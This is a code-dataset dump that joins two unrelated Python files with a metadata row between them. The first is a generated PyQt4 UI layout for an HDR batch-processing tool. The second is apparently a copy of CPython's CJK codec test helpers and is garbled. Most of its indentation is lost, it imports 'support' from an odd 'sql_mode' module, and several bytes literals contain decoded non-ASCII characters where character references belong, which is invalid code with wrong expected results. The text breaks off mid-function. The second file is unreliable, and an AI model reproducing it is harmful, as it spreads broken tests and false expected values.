# Compatibility shim for tr(): older Qt wants an explicit encoding
# argument (UnicodeUTF8); newer bindings removed that enum, so fall back
# to the three-argument translate().
try:
    _encoding = QtGui.QApplication.UnicodeUTF8
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
    """Auto-generated (pyuic4) widget definitions for the HDR Batch Processor window.

    This class only builds, lays out and labels widgets; it contains no
    application logic.  Regenerate it from mainWindow.ui instead of editing
    by hand — the header warns that manual changes will be lost.
    """
    def setupUi(self, MainWindow):
        """Create every widget, layout and spacer and attach them to MainWindow."""
        MainWindow.setObjectName(_fromUtf8("MainWindow"))
        MainWindow.resize(1148, 890)
        self.centralwidget = QtGui.QWidget(MainWindow)
        self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
        # Outer grid (gridLayout_4) holds the single inner grid (gridLayout)
        # in which all controls are positioned by (row, col, rowspan, colspan).
        self.gridLayout_4 = QtGui.QGridLayout(self.centralwidget)
        self.gridLayout_4.setObjectName(_fromUtf8("gridLayout_4"))
        self.gridLayout = QtGui.QGridLayout()
        self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
        self.line_3 = QtGui.QFrame(self.centralwidget)
        self.line_3.setFrameShape(QtGui.QFrame.HLine)
        self.line_3.setFrameShadow(QtGui.QFrame.Sunken)
        self.line_3.setObjectName(_fromUtf8("line_3"))
        self.gridLayout.addWidget(self.line_3, 8, 0, 1, 2)
        spacerItem = QtGui.QSpacerItem(20, 25, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
        self.gridLayout.addItem(spacerItem, 11, 0, 1, 1)
        self.colorBalancing_cb = QtGui.QCheckBox(self.centralwidget)
        self.colorBalancing_cb.setObjectName(_fromUtf8("colorBalancing_cb"))
        self.gridLayout.addWidget(self.colorBalancing_cb, 20, 1, 1, 1)
        # Title row: application name plus version label.
        self.title_hl = QtGui.QHBoxLayout()
        self.title_hl.setObjectName(_fromUtf8("title_hl"))
        self.title_l = QtGui.QLabel(self.centralwidget)
        self.title_l.setMaximumSize(QtCore.QSize(16777215, 40))
        font = QtGui.QFont()
        font.setFamily(_fromUtf8("Droid Serif"))
        font.setPointSize(18)
        self.title_l.setFont(font)
        self.title_l.setAlignment(QtCore.Qt.AlignBottom|QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft)
        self.title_l.setObjectName(_fromUtf8("title_l"))
        self.title_hl.addWidget(self.title_l)
        self.version_l = QtGui.QLabel(self.centralwidget)
        self.version_l.setMaximumSize(QtCore.QSize(16777215, 40))
        self.version_l.setStyleSheet(_fromUtf8("margin-bottom: 2px;"))
        self.version_l.setAlignment(QtCore.Qt.AlignBottom|QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft)
        self.version_l.setObjectName(_fromUtf8("version_l"))
        self.title_hl.addWidget(self.version_l)
        self.gridLayout.addLayout(self.title_hl, 0, 0, 1, 1)
        # Curve input row: label + combo box + "..." browse button.
        self.curveInput_hl = QtGui.QHBoxLayout()
        self.curveInput_hl.setObjectName(_fromUtf8("curveInput_hl"))
        self.curveInput_l = QtGui.QLabel(self.centralwidget)
        self.curveInput_l.setMaximumSize(QtCore.QSize(90, 16777215))
        self.curveInput_l.setObjectName(_fromUtf8("curveInput_l"))
        self.curveInput_hl.addWidget(self.curveInput_l)
        self.curveInput_cb = QtGui.QComboBox(self.centralwidget)
        self.curveInput_cb.setObjectName(_fromUtf8("curveInput_cb"))
        self.curveInput_hl.addWidget(self.curveInput_cb)
        self.curveInput_tb = QtGui.QToolButton(self.centralwidget)
        self.curveInput_tb.setObjectName(_fromUtf8("curveInput_tb"))
        self.curveInput_hl.addWidget(self.curveInput_tb)
        self.gridLayout.addLayout(self.curveInput_hl, 9, 0, 1, 2)
        self.generalSettings_l = QtGui.QLabel(self.centralwidget)
        font = QtGui.QFont()
        font.setPointSize(14)
        self.generalSettings_l.setFont(font)
        self.generalSettings_l.setObjectName(_fromUtf8("generalSettings_l"))
        self.gridLayout.addWidget(self.generalSettings_l, 2, 0, 1, 1)
        spacerItem1 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Minimum)
        self.gridLayout.addItem(spacerItem1, 0, 4, 1, 1)
        self.line_5 = QtGui.QFrame(self.centralwidget)
        self.line_5.setFrameShape(QtGui.QFrame.HLine)
        self.line_5.setFrameShadow(QtGui.QFrame.Sunken)
        self.line_5.setObjectName(_fromUtf8("line_5"))
        self.gridLayout.addWidget(self.line_5, 23, 0, 1, 2)
        self.ghostRemoval_cb = QtGui.QCheckBox(self.centralwidget)
        self.ghostRemoval_cb.setObjectName(_fromUtf8("ghostRemoval_cb"))
        self.gridLayout.addWidget(self.ghostRemoval_cb, 19, 1, 1, 1)
        self.line_6 = QtGui.QFrame(self.centralwidget)
        self.line_6.setFrameShape(QtGui.QFrame.HLine)
        self.line_6.setFrameShadow(QtGui.QFrame.Sunken)
        self.line_6.setObjectName(_fromUtf8("line_6"))
        self.gridLayout.addWidget(self.line_6, 18, 0, 1, 2)
        spacerItem2 = QtGui.QSpacerItem(20, 10, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
        self.gridLayout.addItem(spacerItem2, 1, 0, 1, 1)
        # Output type row (file extension of merged output).
        self.outputType_hl = QtGui.QHBoxLayout()
        self.outputType_hl.setObjectName(_fromUtf8("outputType_hl"))
        self.outputType_l = QtGui.QLabel(self.centralwidget)
        self.outputType_l.setObjectName(_fromUtf8("outputType_l"))
        self.outputType_hl.addWidget(self.outputType_l)
        self.outputType_le = QtGui.QLineEdit(self.centralwidget)
        self.outputType_le.setMaximumSize(QtCore.QSize(70, 16777215))
        self.outputType_le.setObjectName(_fromUtf8("outputType_le"))
        self.outputType_hl.addWidget(self.outputType_le)
        spacerItem3 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
        self.outputType_hl.addItem(spacerItem3)
        self.gridLayout.addLayout(self.outputType_hl, 5, 0, 1, 1)
        # Worker-thread count row.
        self.threads_hl = QtGui.QHBoxLayout()
        self.threads_hl.setObjectName(_fromUtf8("threads_hl"))
        self.threads_l = QtGui.QLabel(self.centralwidget)
        self.threads_l.setObjectName(_fromUtf8("threads_l"))
        self.threads_hl.addWidget(self.threads_l)
        self.threads_sb = QtGui.QSpinBox(self.centralwidget)
        sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.threads_sb.sizePolicy().hasHeightForWidth())
        self.threads_sb.setSizePolicy(sizePolicy)
        self.threads_sb.setMaximumSize(QtCore.QSize(50, 16777215))
        self.threads_sb.setObjectName(_fromUtf8("threads_sb"))
        self.threads_hl.addWidget(self.threads_sb)
        spacerItem4 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
        self.threads_hl.addItem(spacerItem4)
        self.gridLayout.addLayout(self.threads_hl, 4, 0, 1, 1)
        # Bracketed-sequence interval row with "Automatic" override.
        self.seqInterval_hl = QtGui.QHBoxLayout()
        self.seqInterval_hl.setObjectName(_fromUtf8("seqInterval_hl"))
        self.seqInterval_l = QtGui.QLabel(self.centralwidget)
        self.seqInterval_l.setObjectName(_fromUtf8("seqInterval_l"))
        self.seqInterval_hl.addWidget(self.seqInterval_l)
        self.seqInterval_sb = QtGui.QSpinBox(self.centralwidget)
        self.seqInterval_sb.setMaximumSize(QtCore.QSize(60, 16777215))
        self.seqInterval_sb.setProperty("value", 0)
        self.seqInterval_sb.setObjectName(_fromUtf8("seqInterval_sb"))
        self.seqInterval_hl.addWidget(self.seqInterval_sb)
        self.automaticSeq_cb = QtGui.QCheckBox(self.centralwidget)
        self.automaticSeq_cb.setObjectName(_fromUtf8("automaticSeq_cb"))
        self.seqInterval_hl.addWidget(self.automaticSeq_cb)
        spacerItem5 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
        self.seqInterval_hl.addItem(spacerItem5)
        self.gridLayout.addLayout(self.seqInterval_hl, 15, 0, 1, 2)
        # Right-hand column: logger heading, progress bar and text area.
        self.outputLogger_l = QtGui.QLabel(self.centralwidget)
        font = QtGui.QFont()
        font.setPointSize(14)
        self.outputLogger_l.setFont(font)
        self.outputLogger_l.setObjectName(_fromUtf8("outputLogger_l"))
        self.gridLayout.addWidget(self.outputLogger_l, 0, 5, 1, 1)
        self.outputLogger_pb = QtGui.QProgressBar(self.centralwidget)
        self.outputLogger_pb.setProperty("value", 24)
        self.outputLogger_pb.setObjectName(_fromUtf8("outputLogger_pb"))
        self.gridLayout.addWidget(self.outputLogger_pb, 0, 6, 1, 1)
        spacerItem6 = QtGui.QSpacerItem(20, 25, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
        self.gridLayout.addItem(spacerItem6, 16, 0, 1, 1)
        spacerItem7 = QtGui.QSpacerItem(20, 25, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
        self.gridLayout.addItem(spacerItem7, 6, 0, 1, 1)
        self.shottingSettings_l = QtGui.QLabel(self.centralwidget)
        font = QtGui.QFont()
        font.setPointSize(14)
        self.shottingSettings_l.setFont(font)
        self.shottingSettings_l.setObjectName(_fromUtf8("shottingSettings_l"))
        self.gridLayout.addWidget(self.shottingSettings_l, 12, 0, 1, 1)
        self.mergeSettings_l = QtGui.QLabel(self.centralwidget)
        font = QtGui.QFont()
        font.setPointSize(14)
        self.mergeSettings_l.setFont(font)
        self.mergeSettings_l.setObjectName(_fromUtf8("mergeSettings_l"))
        self.gridLayout.addWidget(self.mergeSettings_l, 17, 0, 1, 1)
        spacerItem8 = QtGui.QSpacerItem(20, 20, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
        self.gridLayout.addItem(spacerItem8, 28, 6, 1, 1)
        spacerItem9 = QtGui.QSpacerItem(21, 30, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
        self.gridLayout.addItem(spacerItem9, 29, 0, 1, 7)
        self.curveSettings_l = QtGui.QLabel(self.centralwidget)
        font = QtGui.QFont()
        font.setPointSize(14)
        self.curveSettings_l.setFont(font)
        self.curveSettings_l.setObjectName(_fromUtf8("curveSettings_l"))
        self.gridLayout.addWidget(self.curveSettings_l, 7, 0, 1, 1)
        self.miscSettings_l = QtGui.QLabel(self.centralwidget)
        font = QtGui.QFont()
        font.setPointSize(14)
        self.miscSettings_l.setFont(font)
        self.miscSettings_l.setObjectName(_fromUtf8("miscSettings_l"))
        self.gridLayout.addWidget(self.miscSettings_l, 22, 0, 1, 1)
        self.exposureCorrection_cb = QtGui.QCheckBox(self.centralwidget)
        self.exposureCorrection_cb.setObjectName(_fromUtf8("exposureCorrection_cb"))
        self.gridLayout.addWidget(self.exposureCorrection_cb, 20, 0, 1, 1)
        self.use32bitIEE_cb = QtGui.QCheckBox(self.centralwidget)
        self.use32bitIEE_cb.setChecked(False)
        self.use32bitIEE_cb.setObjectName(_fromUtf8("use32bitIEE_cb"))
        self.gridLayout.addWidget(self.use32bitIEE_cb, 24, 1, 1, 1)
        self.line_4 = QtGui.QFrame(self.centralwidget)
        self.line_4.setFrameShape(QtGui.QFrame.HLine)
        self.line_4.setFrameShadow(QtGui.QFrame.Sunken)
        self.line_4.setObjectName(_fromUtf8("line_4"))
        self.gridLayout.addWidget(self.line_4, 13, 0, 1, 2)
        self.estimateCurve_cb = QtGui.QCheckBox(self.centralwidget)
        self.estimateCurve_cb.setObjectName(_fromUtf8("estimateCurve_cb"))
        self.gridLayout.addWidget(self.estimateCurve_cb, 10, 1, 1, 1)
        self.line_2 = QtGui.QFrame(self.centralwidget)
        self.line_2.setFrameShape(QtGui.QFrame.HLine)
        self.line_2.setFrameShadow(QtGui.QFrame.Sunken)
        self.line_2.setObjectName(_fromUtf8("line_2"))
        self.gridLayout.addWidget(self.line_2, 3, 0, 1, 2)
        self.imageAlignment_cb = QtGui.QCheckBox(self.centralwidget)
        self.imageAlignment_cb.setObjectName(_fromUtf8("imageAlignment_cb"))
        self.gridLayout.addWidget(self.imageAlignment_cb, 19, 0, 1, 1)
        self.okCancel_bb = QtGui.QDialogButtonBox(self.centralwidget)
        self.okCancel_bb.setStandardButtons(QtGui.QDialogButtonBox.Cancel|QtGui.QDialogButtonBox.Ok)
        self.okCancel_bb.setObjectName(_fromUtf8("okCancel_bb"))
        self.gridLayout.addWidget(self.okCancel_bb, 31, 6, 1, 1)
        spacerItem10 = QtGui.QSpacerItem(20, 20, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
        self.gridLayout.addItem(spacerItem10, 30, 6, 1, 1)
        self.autoRenameFiles_cb = QtGui.QCheckBox(self.centralwidget)
        self.autoRenameFiles_cb.setObjectName(_fromUtf8("autoRenameFiles_cb"))
        self.gridLayout.addWidget(self.autoRenameFiles_cb, 5, 1, 1, 1)
        self.defaultCurve_cb = QtGui.QCheckBox(self.centralwidget)
        self.defaultCurve_cb.setObjectName(_fromUtf8("defaultCurve_cb"))
        self.gridLayout.addWidget(self.defaultCurve_cb, 10, 0, 1, 1)
        self.outputLogger_te = QtGui.QTextEdit(self.centralwidget)
        self.outputLogger_te.setMinimumSize(QtCore.QSize(530, 0))
        self.outputLogger_te.setStyleSheet(_fromUtf8("background-color: #cccccc;"))
        self.outputLogger_te.setObjectName(_fromUtf8("outputLogger_te"))
        self.gridLayout.addWidget(self.outputLogger_te, 1, 5, 27, 2)
        self.ignoreMissingExposures_cb = QtGui.QCheckBox(self.centralwidget)
        self.ignoreMissingExposures_cb.setObjectName(_fromUtf8("ignoreMissingExposures_cb"))
        self.gridLayout.addWidget(self.ignoreMissingExposures_cb, 24, 0, 1, 1)
        self.recursiveSearch_cb = QtGui.QCheckBox(self.centralwidget)
        self.recursiveSearch_cb.setObjectName(_fromUtf8("recursiveSearch_cb"))
        self.gridLayout.addWidget(self.recursiveSearch_cb, 4, 1, 1, 1)
        spacerItem11 = QtGui.QSpacerItem(20, 25, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
        self.gridLayout.addItem(spacerItem11, 21, 0, 1, 1)
        # F-number row: a stacked widget swaps between a combo box (page 0)
        # and a free-text line edit (page 1) when "Manual" is checked.
        self.fnum_hl = QtGui.QHBoxLayout()
        self.fnum_hl.setObjectName(_fromUtf8("fnum_hl"))
        self.fnum_l = QtGui.QLabel(self.centralwidget)
        self.fnum_l.setObjectName(_fromUtf8("fnum_l"))
        self.fnum_hl.addWidget(self.fnum_l)
        self.fnum_sw = QtGui.QStackedWidget(self.centralwidget)
        sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.fnum_sw.sizePolicy().hasHeightForWidth())
        self.fnum_sw.setSizePolicy(sizePolicy)
        self.fnum_sw.setMaximumSize(QtCore.QSize(80, 16777215))
        self.fnum_sw.setObjectName(_fromUtf8("fnum_sw"))
        self.fnum_cb_p = QtGui.QWidget()
        self.fnum_cb_p.setObjectName(_fromUtf8("fnum_cb_p"))
        self.gridLayout_3 = QtGui.QGridLayout(self.fnum_cb_p)
        self.gridLayout_3.setObjectName(_fromUtf8("gridLayout_3"))
        self.fnum_cb = QtGui.QComboBox(self.fnum_cb_p)
        sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.fnum_cb.sizePolicy().hasHeightForWidth())
        self.fnum_cb.setSizePolicy(sizePolicy)
        self.fnum_cb.setMaximumSize(QtCore.QSize(16777215, 16777215))
        self.fnum_cb.setObjectName(_fromUtf8("fnum_cb"))
        self.gridLayout_3.addWidget(self.fnum_cb, 0, 0, 1, 1)
        self.fnum_sw.addWidget(self.fnum_cb_p)
        self.fnum_le_p = QtGui.QWidget()
        self.fnum_le_p.setObjectName(_fromUtf8("fnum_le_p"))
        self.gridLayout_2 = QtGui.QGridLayout(self.fnum_le_p)
        self.gridLayout_2.setObjectName(_fromUtf8("gridLayout_2"))
        self.fnum_le = QtGui.QLineEdit(self.fnum_le_p)
        self.fnum_le.setObjectName(_fromUtf8("fnum_le"))
        self.gridLayout_2.addWidget(self.fnum_le, 0, 0, 1, 1)
        self.fnum_sw.addWidget(self.fnum_le_p)
        self.fnum_hl.addWidget(self.fnum_sw)
        self.manual_fnum_cb = QtGui.QCheckBox(self.centralwidget)
        self.manual_fnum_cb.setObjectName(_fromUtf8("manual_fnum_cb"))
        self.fnum_hl.addWidget(self.manual_fnum_cb)
        spacerItem12 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
        self.fnum_hl.addItem(spacerItem12)
        self.gridLayout.addLayout(self.fnum_hl, 14, 0, 1, 2)
        self.gridLayout_4.addLayout(self.gridLayout, 0, 0, 1, 1)
        MainWindow.setCentralWidget(self.centralwidget)
        # Standard window chrome: empty menu bar and status bar.
        self.menubar = QtGui.QMenuBar(MainWindow)
        self.menubar.setGeometry(QtCore.QRect(0, 0, 1148, 25))
        self.menubar.setObjectName(_fromUtf8("menubar"))
        MainWindow.setMenuBar(self.menubar)
        self.statusbar = QtGui.QStatusBar(MainWindow)
        self.statusbar.setObjectName(_fromUtf8("statusbar"))
        MainWindow.setStatusBar(self.statusbar)
        self.retranslateUi(MainWindow)
        self.fnum_sw.setCurrentIndex(0)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)
    def retranslateUi(self, MainWindow):
        """Assign all user-visible strings (called once at the end of setupUi)."""
        MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow", None))
        self.colorBalancing_cb.setText(_translate("MainWindow", "Color Balancing", None))
        self.title_l.setText(_translate("MainWindow", "HDR Batch Processor", None))
        self.version_l.setText(_translate("MainWindow", "v 1.2.0", None))
        self.curveInput_l.setText(_translate("MainWindow", "Curve Input", None))
        self.curveInput_tb.setText(_translate("MainWindow", "...", None))
        self.generalSettings_l.setText(_translate("MainWindow", "General", None))
        self.ghostRemoval_cb.setText(_translate("MainWindow", "Ghost Removal", None))
        self.outputType_l.setText(_translate("MainWindow", "Output Type", None))
        self.threads_l.setText(_translate("MainWindow", "Number of Threads", None))
        self.seqInterval_l.setText(_translate("MainWindow", "Sequence Interval", None))
        self.automaticSeq_cb.setText(_translate("MainWindow", "Automatic", None))
        self.outputLogger_l.setText(_translate("MainWindow", "Output Logger", None))
        self.shottingSettings_l.setText(_translate("MainWindow", "Shooting Settings", None))
        self.mergeSettings_l.setText(_translate("MainWindow", "Merge Settings", None))
        self.curveSettings_l.setText(_translate("MainWindow", "Curve Settings", None))
        self.miscSettings_l.setText(_translate("MainWindow", "Misc Settings", None))
        self.exposureCorrection_cb.setText(_translate("MainWindow", "Exposure Correction", None))
        self.use32bitIEE_cb.setText(_translate("MainWindow", "Use 32-bit-float IEEE for TIFFs", None))
        self.estimateCurve_cb.setText(_translate("MainWindow", "Estimate Curve only", None))
        self.imageAlignment_cb.setText(_translate("MainWindow", "Image Alignment", None))
        self.autoRenameFiles_cb.setText(_translate("MainWindow", "auto-rename files", None))
        self.defaultCurve_cb.setText(_translate("MainWindow", "Default Curve", None))
        # Empty rich-text document boilerplate emitted by Qt Designer for the
        # logger text area.
        self.outputLogger_te.setHtml(_translate("MainWindow", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p></body></html>", None))
        self.ignoreMissingExposures_cb.setText(_translate("MainWindow", "Ignore Missing Exposure Values", None))
        self.recursiveSearch_cb.setText(_translate("MainWindow", "recursive search", None))
        self.fnum_l.setText(_translate("MainWindow", "F-Number", None))
        self.manual_fnum_cb.setText(_translate("MainWindow", "Manual", None))
| [
"colinvfx@gmail.com"
] | colinvfx@gmail.com |
417d45c85e9605ae85af1136b0377cb8910c06d5 | c8b541ea4fa7d159b80bef116e5cd232ac61b8c1 | /venv/Lib/test/multibytecodec_support.py | 2fed0b7c2ee8c31dc4890ee7dbd94ec0772518b4 | [] | no_license | shengmenghui/knowledge_building | 7a2d8eef040c2d3a45726b3a908be301e922024b | 04fd7784f15535efed917cce44856526f1f0ce48 | refs/heads/master | 2022-12-31T14:18:05.282092 | 2020-10-23T02:51:37 | 2020-10-23T02:51:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,786 | py | #
# multibytecodec_support.py
# Common Unittest Routines for CJK codecs
#
import codecs
import os
import re
import sys
import unittest
from http.client import HTTPException
from sql_mode import support
from io import BytesIO
class TestBase:
encoding = '' # codec name
codec = None # codec tuple (with 4 elements)
tstring = None # must set. 2 strings to test StreamReader
codectests = None # must set. codec test tuple
roundtriptest = 1 # set if roundtrip is possible with unicode
has_iso10646 = 0 # set if this encoding contains whole iso10646 map
xmlcharnametest = None # string to test xmlcharrefreplace
unmappedunicode = '\udeee' # a unicode code point that is not mapped.
def setUp(self):
if self.codec is None:
self.codec = codecs.lookup(self.encoding)
self.encode = self.codec.encode
self.decode = self.codec.decode
self.reader = self.codec.streamreader
self.writer = self.codec.streamwriter
self.incrementalencoder = self.codec.incrementalencoder
self.incrementaldecoder = self.codec.incrementaldecoder
def test_chunkcoding(self):
tstring_lines = []
for b in self.tstring:
lines = b.split(b"\n")
last = lines.pop()
assert last == b""
lines = [line + b"\n" for line in lines]
tstring_lines.append(lines)
for native, utf8 in zip(*tstring_lines):
u = self.decode(native)[0]
self.assertEqual(u, utf8.decode('utf-8'))
if self.roundtriptest:
self.assertEqual(native, self.encode(u)[0])
def test_errorhandle(self):
for source, scheme, expected in self.codectests:
if isinstance(source, bytes):
func = self.decode
else:
func = self.encode
if expected:
result = func(source, scheme)[0]
if func is self.decode:
self.assertTrue(type(result) is str, type(result))
self.assertEqual(result, expected,
'%a.decode(%r, %r)=%a != %a'
% (source, self.encoding, scheme, result,
expected))
else:
self.assertTrue(type(result) is bytes, type(result))
self.assertEqual(result, expected,
'%a.encode(%r, %r)=%a != %a'
% (source, self.encoding, scheme, result,
expected))
else:
self.assertRaises(UnicodeError, func, source, scheme)
def test_xmlcharrefreplace(self):
if self.has_iso10646:
self.skipTest('encoding contains full ISO 10646 map')
s = "\u0b13\u0b23\u0b60 nd eggs"
self.assertEqual(
self.encode(s, "xmlcharrefreplace")[0],
b"ଓଣୠ nd eggs"
)
def test_customreplace_encode(self):
if self.has_iso10646:
self.skipTest('encoding contains full ISO 10646 map')
from html.entities import codepoint2name
def xmlcharnamereplace(exc):
if not isinstance(exc, UnicodeEncodeError):
raise TypeError("don't know how to handle %r" % exc)
l = []
for c in exc.object[exc.start:exc.end]:
if ord(c) in codepoint2name:
l.append("&%s;" % codepoint2name[ord(c)])
else:
l.append("&#%d;" % ord(c))
return ("".join(l), exc.end)
codecs.register_error("test.xmlcharnamereplace", xmlcharnamereplace)
if self.xmlcharnametest:
sin, sout = self.xmlcharnametest
else:
sin = "\xab\u211c\xbb = \u2329\u1234\u232a"
sout = b"«ℜ» = ⟨ሴ⟩"
self.assertEqual(self.encode(sin,
"test.xmlcharnamereplace")[0], sout)
def test_callback_returns_bytes(self):
def myreplace(exc):
return (b"1234", exc.end)
codecs.register_error("test.cjktest", myreplace)
enc = self.encode("abc" + self.unmappedunicode + "def", "test.cjktest")[0]
self.assertEqual(enc, b"abc1234def")
def test_callback_wrong_objects(self):
def myreplace(exc):
return (ret, exc.end)
codecs.register_error("test.cjktest", myreplace)
for ret in ([1, 2, 3], [], None, object()):
self.assertRaises(TypeError, self.encode, self.unmappedunicode,
'test.cjktest')
def test_callback_long_index(self):
def myreplace(exc):
return ('x', int(exc.end))
codecs.register_error("test.cjktest", myreplace)
self.assertEqual(self.encode('abcd' + self.unmappedunicode + 'efgh',
'test.cjktest'), (b'abcdxefgh', 9))
def myreplace(exc):
return ('x', sys.maxsize + 1)
codecs.register_error("test.cjktest", myreplace)
self.assertRaises(IndexError, self.encode, self.unmappedunicode,
'test.cjktest')
def test_callback_None_index(self):
def myreplace(exc):
return ('x', None)
codecs.register_error("test.cjktest", myreplace)
self.assertRaises(TypeError, self.encode, self.unmappedunicode,
'test.cjktest')
def test_callback_backward_index(self):
def myreplace(exc):
if myreplace.limit > 0:
myreplace.limit -= 1
return ('REPLACED', 0)
else:
return ('TERMINAL', exc.end)
myreplace.limit = 3
codecs.register_error("test.cjktest", myreplace)
self.assertEqual(self.encode('abcd' + self.unmappedunicode + 'efgh',
'test.cjktest'),
(b'abcdREPLACEDabcdREPLACEDabcdREPLACEDabcdTERMINALefgh', 9))
def test_callback_forward_index(self):
def myreplace(exc):
return ('REPLACED', exc.end + 2)
codecs.register_error("test.cjktest", myreplace)
self.assertEqual(self.encode('abcd' + self.unmappedunicode + 'efgh',
'test.cjktest'), (b'abcdREPLACEDgh', 9))
def test_callback_index_outofbound(self):
def myreplace(exc):
return ('TERM', 100)
codecs.register_error("test.cjktest", myreplace)
self.assertRaises(IndexError, self.encode, self.unmappedunicode,
'test.cjktest')
def test_incrementalencoder(self):
UTF8Reader = codecs.getreader('utf-8')
for sizehint in [None] + list(range(1, 33)) + \
[64, 128, 256, 512, 1024]:
istream = UTF8Reader(BytesIO(self.tstring[1]))
ostream = BytesIO()
encoder = self.incrementalencoder()
while 1:
if sizehint is not None:
data = istream.read(sizehint)
else:
data = istream.read()
if not data:
break
e = encoder.encode(data)
ostream.write(e)
self.assertEqual(ostream.getvalue(), self.tstring[0])
def test_incrementaldecoder(self):
UTF8Writer = codecs.getwriter('utf-8')
for sizehint in [None, -1] + list(range(1, 33)) + \
[64, 128, 256, 512, 1024]:
istream = BytesIO(self.tstring[0])
ostream = UTF8Writer(BytesIO())
decoder = self.incrementaldecoder()
while 1:
data = istream.read(sizehint)
if not data:
break
else:
u = decoder.decode(data)
ostream.write(u)
self.assertEqual(ostream.getvalue(), self.tstring[1])
def test_incrementalencoder_error_callback(self):
inv = self.unmappedunicode
e = self.incrementalencoder()
self.assertRaises(UnicodeEncodeError, e.encode, inv, True)
e.errors = 'ignore'
self.assertEqual(e.encode(inv, True), b'')
e.reset()
def tempreplace(exc):
return ('called', exc.end)
codecs.register_error('test.incremental_error_callback', tempreplace)
e.errors = 'test.incremental_error_callback'
self.assertEqual(e.encode(inv, True), b'called')
# again
e.errors = 'ignore'
self.assertEqual(e.encode(inv, True), b'')
def test_streamreader(self):
UTF8Writer = codecs.getwriter('utf-8')
for name in ["read", "readline", "readlines"]:
for sizehint in [None, -1] + list(range(1, 33)) + \
[64, 128, 256, 512, 1024]:
istream = self.reader(BytesIO(self.tstring[0]))
ostream = UTF8Writer(BytesIO())
func = getattr(istream, name)
while 1:
data = func(sizehint)
if not data:
break
if name == "readlines":
ostream.writelines(data)
else:
ostream.write(data)
self.assertEqual(ostream.getvalue(), self.tstring[1])
def test_streamwriter(self):
readfuncs = ('read', 'readline', 'readlines')
UTF8Reader = codecs.getreader('utf-8')
for name in readfuncs:
for sizehint in [None] + list(range(1, 33)) + \
[64, 128, 256, 512, 1024]:
istream = UTF8Reader(BytesIO(self.tstring[1]))
ostream = self.writer(BytesIO())
func = getattr(istream, name)
while 1:
if sizehint is not None:
data = func(sizehint)
else:
data = func()
if not data:
break
if name == "readlines":
ostream.writelines(data)
else:
ostream.write(data)
self.assertEqual(ostream.getvalue(), self.tstring[0])
def test_streamwriter_reset_no_pending(self):
# Issue #23247: Calling reset() on a fresh StreamWriter instance
# (without pending data) must not crash
stream = BytesIO()
writer = self.writer(stream)
writer.reset()
class TestBase_Mapping(unittest.TestCase):
    """Verify a codec against its published code-point mapping table.

    Subclasses set ``encoding`` and ``mapfileurl`` (a plain mapping table or
    a .xml/ucm file); optional class lists exempt or extend individual pairs.
    """
    pass_enctest = []   # (bytes, str) pairs excused from the encode check
    pass_dectest = []   # (bytes, str) pairs excused from the decode check
    supmaps = []        # extra (bytes, str) pairs to verify
    codectests = []     # (source, errors-scheme, expected) error-handling table
    def setUp(self):
        try:
            self.open_mapping_file().close() # test it to report the error early
        except (OSError, HTTPException):
            self.skipTest("Could not retrieve "+self.mapfileurl)
    def open_mapping_file(self):
        """Fetch (and cache) the mapping table resource for this codec."""
        return support.open_urlresource(self.mapfileurl)
    def test_mapping_file(self):
        """Dispatch on table format: .xml/ucm vs. plain two-column text."""
        if self.mapfileurl.endswith('.xml'):
            self._test_mapping_file_ucm()
        else:
            self._test_mapping_file_plain()
    def _test_mapping_file_plain(self):
        """Parse '0xNN 0xMMMM' style lines and check both directions."""
        # 'a+b' unicode values denote multi-codepoint targets.
        unichrs = lambda s: ''.join(map(chr, map(eval, s.split('+'))))
        urt_wa = {}  # reverse map: keep only the first codeset value per char
        with self.open_mapping_file() as f:
            for line in f:
                if not line:
                    break
                data = line.split('#')[0].strip().split()
                if len(data) != 2:
                    continue
                # Re-encode the integer codeset value as 1-4 raw bytes.
                csetval = eval(data[0])
